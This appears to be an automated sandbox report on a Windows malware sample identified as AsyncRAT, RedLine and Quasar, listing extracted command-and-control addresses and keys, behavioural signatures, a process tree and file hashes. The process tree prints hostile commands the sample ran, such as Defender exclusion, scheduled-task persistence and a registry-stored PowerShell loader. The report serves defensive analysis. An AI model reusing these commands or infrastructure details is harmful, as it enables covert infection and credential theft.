Analysis
-
max time kernel
151s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
01/11/2022, 10:41
Static task
static1
Behavioral task
behavioral1
Sample
BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Resource
win7-20220812-en
General
-
Target
BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
-
Size
584KB
-
MD5
8553f9793539d4d17c13e464d606d7dc
-
SHA1
a033d05b0c0a5b220fde15827b5c716fbec3b398
-
SHA256
bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
-
SHA512
2d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec
-
SSDEEP
6144:LHns2eIXWxewKi/i/iHBW0LM7Sx2R1i0t03ugcHg4TU48YMizi:LH4x4KKABW0g2x6/t2S/UfYM4
Malware Config
Extracted
asyncrat
Ratatouille 0.1.0
Youtube
179.43.187.19:33
179.43.187.19:2525
179.43.187.19:4523
179.43.187.19:5555
sdhgamkfgae4-youtube
-
delay
3
-
install
true
-
install_file
$77-update.exe
-
install_folder
%AppData%
Extracted
redline
cheat
179.43.187.19:18875
Extracted
quasar
1.4.0
r77Version
179.43.187.19:2326
d6db683c-9b85-4417-b1a3-4ff8bec1d98b
-
encryption_key
83FE26AAD844F101036726AFCD7F28CF377D20AF
-
install_name
$77Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
$77Client
-
subdirectory
$77win
Signatures
-
Quasar payload 3 IoCs
resource yara_rule behavioral1/files/0x000c0000000122ec-321.dat family_quasar behavioral1/files/0x000c0000000122ec-323.dat family_quasar behavioral1/files/0x000c0000000122ec-320.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/files/0x000c0000000122e0-264.dat family_redline behavioral1/files/0x000c0000000122e0-267.dat family_redline behavioral1/files/0x000c0000000122e0-265.dat family_redline behavioral1/memory/972-274-0x0000000000180000-0x000000000019E000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1108 created 416 1108 powershell.EXE 3 PID 1976 created 416 1976 powershell.EXE 3 -
Async RAT payload 10 IoCs
resource yara_rule behavioral1/memory/1920-62-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1920-63-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1920-64-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1920-65-0x000000000040D15E-mapping.dmp asyncrat behavioral1/memory/1920-67-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1920-69-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1536-90-0x000000000040D15E-mapping.dmp asyncrat behavioral1/memory/1536-95-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1536-93-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1536-106-0x00000000005C0000-0x00000000005CC000-memory.dmp asyncrat -
Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions $77-update.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe -
Executes dropped EXE 6 IoCs
pid Process 1564 $77-update.exe 1536 $77-update.exe 1636 pnzqhe.exe 972 aztndq.exe 608 jryyjp.exe 820 adiojv.exe -
Looks for VMWare Tools registry key 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools $77-update.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion $77-update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion $77-update.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Clip.exe jryyjp.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Clip.exe jryyjp.exe -
Loads dropped DLL 6 IoCs
pid Process 968 cmd.exe 1564 $77-update.exe 948 powershell.exe 784 powershell.exe 896 powershell.exe 1540 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Maps connected drives based on registry 3 TTPs 4 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum $77-update.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 $77-update.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1488 set thread context of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1564 set thread context of 1536 1564 $77-update.exe 36 PID 1976 set thread context of 680 1976 powershell.EXE 50 PID 1108 set thread context of 588 1108 powershell.EXE 51 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1380 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1668 timeout.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b00bc812e7edd801 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 540 powershell.exe 1608 powershell.exe 948 powershell.exe 948 powershell.exe 948 powershell.exe 1536 $77-update.exe 1108 powershell.EXE 1976 powershell.EXE 1108 powershell.EXE 1976 powershell.EXE 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 784 powershell.exe 896 powershell.exe 680 dllhost.exe 680 dllhost.exe 784 powershell.exe 784 powershell.exe 896 powershell.exe 896 powershell.exe 1536 $77-update.exe 1536 $77-update.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 680 dllhost.exe 1540 powershell.exe 680 dllhost.exe 680 dllhost.exe 1540 powershell.exe 1540 powershell.exe 1536 $77-update.exe 680 dllhost.exe 680 dllhost.exe 972 aztndq.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Token: SeDebugPrivilege 1536 $77-update.exe Token: SeDebugPrivilege 1536 $77-update.exe Token: SeDebugPrivilege 540 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 1108 powershell.EXE Token: SeDebugPrivilege 1976 powershell.EXE Token: SeDebugPrivilege 1108 powershell.EXE Token: SeDebugPrivilege 1976 powershell.EXE Token: SeDebugPrivilege 680 dllhost.exe Token: SeAuditPrivilege 868 svchost.exe Token: SeAuditPrivilege 868 svchost.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeShutdownPrivilege 1352 Explorer.EXE Token: SeShutdownPrivilege 1352 Explorer.EXE Token: SeDebugPrivilege 972 aztndq.exe Token: SeAuditPrivilege 868 svchost.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 820 adiojv.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1488 wrote to memory of 1920 1488 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 28 PID 1920 wrote to memory of 1628 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 29 PID 1920 wrote to memory of 1628 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 29 PID 1920 wrote to memory of 1628 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 29 PID 1920 wrote to memory of 1628 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 29 PID 1920 wrote to memory of 968 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 31 PID 1920 wrote to memory of 968 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 31 PID 1920 wrote to memory of 968 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 31 PID 1920 wrote to memory of 968 1920 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 31 PID 1628 wrote to memory of 1380 1628 cmd.exe 33 PID 1628 wrote to memory of 1380 1628 cmd.exe 33 PID 1628 wrote to memory of 1380 1628 cmd.exe 33 PID 1628 wrote to memory of 1380 1628 cmd.exe 33 PID 968 wrote to memory of 1668 968 cmd.exe 34 PID 968 wrote to memory of 1668 968 cmd.exe 34 PID 968 wrote to memory of 1668 968 cmd.exe 34 PID 968 wrote to memory of 1668 968 cmd.exe 34 PID 968 wrote to memory of 1564 968 cmd.exe 35 PID 968 wrote to memory of 1564 968 cmd.exe 35 PID 968 wrote to memory of 1564 968 cmd.exe 35 PID 968 wrote to memory of 1564 968 cmd.exe 35 PID 968 wrote to memory of 1564 968 cmd.exe 35 PID 968 wrote to memory of 1564 968 cmd.exe 35 PID 968 wrote to memory of 1564 968 cmd.exe 35 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1564 wrote to memory of 1536 1564 $77-update.exe 36 PID 1536 wrote to memory of 540 1536 $77-update.exe 37 PID 1536 wrote to memory of 540 1536 $77-update.exe 37 PID 1536 wrote to memory of 540 1536 $77-update.exe 37 PID 1536 wrote to memory of 540 1536 $77-update.exe 37 PID 1536 wrote to memory of 1608 1536 $77-update.exe 39 PID 1536 wrote to memory of 1608 1536 $77-update.exe 39 PID 1536 wrote to memory of 1608 1536 $77-update.exe 39 PID 1536 wrote to memory of 1608 1536 $77-update.exe 39 PID 1536 wrote to memory of 704 1536 $77-update.exe 41 PID 1536 wrote to memory of 704 1536 $77-update.exe 41 PID 1536 wrote to memory of 704 1536 $77-update.exe 41 PID 1536 wrote to memory of 704 1536 $77-update.exe 41 PID 704 wrote to memory of 948 704 cmd.exe 43 PID 704 wrote to memory of 948 704 cmd.exe 43 PID 704 wrote to memory of 948 704 cmd.exe 43 PID 704 wrote to memory of 948 704 cmd.exe 43 PID 948 wrote to memory of 1636 948 powershell.exe 44 PID 948 wrote to memory of 1636 948 powershell.exe 44 PID 948 wrote to memory of 1636 948 powershell.exe 44 PID 948 wrote to memory of 1636 948 powershell.exe 44
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:476
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:868 -
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵PID:2000
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B5D88114-AA30-4B8B-92A7-7D62C2E8F18E} S-1-5-18:NT AUTHORITY\System:Service:3⤵PID:1604
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:272
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1228
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1816
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1128
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1028
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:300
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:844
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:792
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:744
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:656
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:580
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:816
-
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:416
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a6b6aeb0-d464-4ea5-b2ac-d509709e490e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{16e1b028-0440-415f-b06f-43c00916467e}2⤵PID:588
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:484
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1316
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"{path}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"'5⤵
- Creates scheduled task(s)
PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1A7.tmp.bat""4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:1668
-
-
C:\Users\Admin\AppData\Roaming\$77-update.exe"C:\Users\Admin\AppData\Roaming\$77-update.exe"5⤵
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Loads dropped DLL
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Users\Admin\AppData\Roaming\$77-update.exe"{path}"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension @('exe','dll') -Force7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pnzqhe.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pnzqhe.exe"'8⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Users\Admin\AppData\Local\Temp\pnzqhe.exe"C:\Users\Admin\AppData\Local\Temp\pnzqhe.exe"9⤵
- Executes dropped EXE
PID:1636
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jryyjp.exe"' & exit7⤵PID:1192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jryyjp.exe"'8⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896 -
C:\Users\Admin\AppData\Local\Temp\jryyjp.exe"C:\Users\Admin\AppData\Local\Temp\jryyjp.exe"9⤵
- Executes dropped EXE
- Drops startup file
PID:608
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aztndq.exe"' & exit7⤵PID:1648
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aztndq.exe"'8⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784 -
C:\Users\Admin\AppData\Local\Temp\aztndq.exe"C:\Users\Admin\AppData\Local\Temp\aztndq.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\adiojv.exe"' & exit7⤵PID:896
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\adiojv.exe"'8⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\adiojv.exe"C:\Users\Admin\AppData\Local\Temp\adiojv.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
-
-
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "668684495-1483970502-1418786949-800884811-977448482-96501856-1772843700-170108309"1⤵PID:576
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1139731289-13498560651055892570-1906471362-15694092201933630600290700091608861979"1⤵PID:1532
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1507667889-268449033-1423338198-1492980253620861439-1933508774-387094207-288685600"1⤵PID:1624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20393064051757100730-16330321699532405612044648895250725453-2117161765-1091857355"1⤵PID:1632
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-268108441-266419577-9576016062078434459-505200725-6611749502065749379-440121918"1⤵PID:1516
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
502KB
MD5254850c126b7dd70bc258b16a5fa029c
SHA1993c0147f75530ae0d3c45a971abe71eb0a8a68e
SHA256064abdb50b3a06bc95b60e28b37e371af3ab7fe0918e5337713d94a686d25740
SHA512eb2d44ee1c67c247fc184f38764c762a04266773d8669e488d78f0a777d28c26a31033d8b1ec5bc36896f4ef8098fa641210919798bd2722a5b15e2dd1bba8cf
-
Filesize
502KB
MD5254850c126b7dd70bc258b16a5fa029c
SHA1993c0147f75530ae0d3c45a971abe71eb0a8a68e
SHA256064abdb50b3a06bc95b60e28b37e371af3ab7fe0918e5337713d94a686d25740
SHA512eb2d44ee1c67c247fc184f38764c762a04266773d8669e488d78f0a777d28c26a31033d8b1ec5bc36896f4ef8098fa641210919798bd2722a5b15e2dd1bba8cf
-
Filesize
95KB
MD53cb329c9120e1ddc5717b26631760fe8
SHA154998ad15f5a3e87bbd140f67473e7d418b23c92
SHA25668a30dd865b1e67cb013a5dfe856aaf1a93df96c7feed9645288e4d8876b9bc5
SHA5127090b8fbd4042b5db300751ccce0eb72e628899da52efb1e4059eb36423fb5e63121bee1c5ee4367920c1c9cd4000bb28fd70774846c53e6686b7e1a3c57b970
-
Filesize
95KB
MD53cb329c9120e1ddc5717b26631760fe8
SHA154998ad15f5a3e87bbd140f67473e7d418b23c92
SHA25668a30dd865b1e67cb013a5dfe856aaf1a93df96c7feed9645288e4d8876b9bc5
SHA5127090b8fbd4042b5db300751ccce0eb72e628899da52efb1e4059eb36423fb5e63121bee1c5ee4367920c1c9cd4000bb28fd70774846c53e6686b7e1a3c57b970
-
Filesize
9KB
MD570aa2221d41c15462b83d86670e804ca
SHA13c711d4d294b9d3db9b71bbb6edce30c4a59f032
SHA2566ed8c7a401fcab2242cd8be75c39e6b38dea1d95d3995d81ec81b6ecb46f9fe5
SHA5129997fe37eafaadf72c4b884259053ab85250baabc4b9127d39d445a159c39509510d495ddaac229ee2940c76133ed9faddea8bb56cb71463df2757c379d2d5e3
-
Filesize
9KB
MD570aa2221d41c15462b83d86670e804ca
SHA13c711d4d294b9d3db9b71bbb6edce30c4a59f032
